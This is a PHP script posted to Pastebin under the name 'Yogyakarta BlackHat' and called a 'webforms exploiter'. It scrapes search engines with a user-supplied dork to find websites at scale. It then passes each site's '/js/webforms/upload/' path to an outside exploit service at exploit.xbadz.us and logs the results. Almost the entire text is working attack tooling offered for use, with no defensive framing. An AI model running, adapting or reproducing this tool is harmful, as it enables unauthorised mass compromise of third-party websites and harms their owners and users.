Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- date_default_timezone_set('America/Los_Angeles');
- // ===================================
- // YOGYAKARTA BLACKHAT
- // ===================================
- // Thanks To FathurFreakz
- // Usage: php filename.php "Dork"
- // Example: php badchilds.php "/customer/account/"
- // ===================================
- // Starting Class
- class BADCHILDS {
- private $xBadcc = "BADCHILDS";
- private $xBadZone = "http://xbadz.us/";
- private $xBadOrg = "Yogyakarta BlackHat";
- private $dork = "";
- //Starting Dork from Terminal Usage.
- function __construct($dork){
- return $this->dork = $dork;
- }
- //End Dork
- // Please Dont Change, this is a Landmark.
- function YogyakartaBlackhat(){
- $bad = "====================================\n";
- $bad .= "# BADCHILDS - WEBFORMS EXPLOITER #\n";
- $bad .= "#\t\t Yogyakarta Blackhat \t\t#\n";
- $bad .= "#\t Thanks To FathurFreakz \t#\n";
- $bad .= "#\t\t YKBH(C)".date("Y")." \t\t#\n";
- $bad .= "====================================\n";
- $bad .= "#\t Usage \t\t: php ".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php \"Dork\"\t #\n";
- $bad .= "====================================\n";
- echo $bad;
- }
- // End Landmark
- // Get Curl Post for Calling Target.
- private function BadCurlPost($url, $post = false){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- if($post !== false){
- $isi = '';
- foreach($post as $key=>$value){
- $isi .= $key.'='.$value.'&';
- }
- rtrim($isi, '&');
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_POST, count($isi));
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
- }
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- // End Curl Post
- // Get Target From Dork - Search Engine on Bing.
- public function SearchingEngine($engine){
- $list = array();
- $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
- $ccgoogle = array("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
- switch($engine){
- case 1:
- for($i=0;$i<=1000;$i+=10){
- $search = $this->BadCurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&first=".$i);
- preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){
- if(!in_array($link,$list)){
- $list[] = $link;
- }
- }
- }
- echo "[".date("H:i:s")."] Get Bing => [".count(array_unique($m[1]))."]\n";
- }
- break;
- case 2:
- for($x=0;$x<=count($ccbing)-1;$x++){
- for($i=0;$i<=1000;$i+=10){
- $search = $this->BadCurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE");
- preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){
- if(!in_array($link,$list)){
- $list[] = $link;
- }
- }
- }
- echo "[".date("H:i:s")."] Get Bing ".$ccbing[$x]." => [".count(array_unique($m[1]))."]\n";
- }
- }
- echo "[".date("H:i:s")."] Result Searching => ".count($list)."\n";
- break;
- case 3:
- for($x=0;$x<=count($ccgoogle)-1;$x++){
- for($i=0;$i<=200;$i+=10){
- $search = $this->CurlPost("http://www.google.".$ccgoogle[$x]."/search?num=50&q=inurl:".urlencode($this->dork)."&start=".$i."&sa=N");
- preg_match_all('/<a href=\"?http:\/\/([^>\"]*)\//m', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/google/",$link)){
- if(!in_array($link,$list)){
- $list[] = $link;
- }
- }
- }
- echo "Get Google => [".count(array_unique($m[1]))."]\n";
- }
- }
- echo "Result Searching => ".count($list)."\n";
- break;
- }
- if(count($list)>0){
- echo "Start Exploit => [ ".count($list)." Dorks ]\nPlease Wait ... \n";
- foreach($list as $do){
- echo $this->BadExploiting($do)."\n";
- }
- }
- }
- // End Searching
- // Started Exploiting Target, Call Dork and Get Target
- private function BadExploiting($target){
- $link = parse_url($target);
- $data = $this->BadCurlPost("http://exploit.xbadz.us/badchilds.php?victim=".sprintf("%s://%s/js/webforms/upload/",(isset($link["scheme"]) ? $link["scheme"] : "http://"),(isset($link["host"]) ? $link["host"] : $target))."&get=TRUE");
- $Result = fopen("Webresult-".date("d-m-Y").".log","a");
- $xbadchilds = strtoupper(sprintf("%s://%s/js/webforms/upload/",(isset($link["scheme"]) ? $link["scheme"] : "http://"),(isset($link["host"]) ? $link["host"] : $target)));
- fwrite($Result,$data, strlen($data));
- fclose($Result);
- return "===>[ ". $xbadchilds ." ]<===\n".$data;
- }
- // End Exploiting
- }
- // End Class
- $Exploiter = new BADCHILDS($argv[1]);
- echo "Get Searching ".$argv[1]."\n";
- for($x=1;$x<3;$x++){
- $Exploiter->SearchingEngine($x);
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
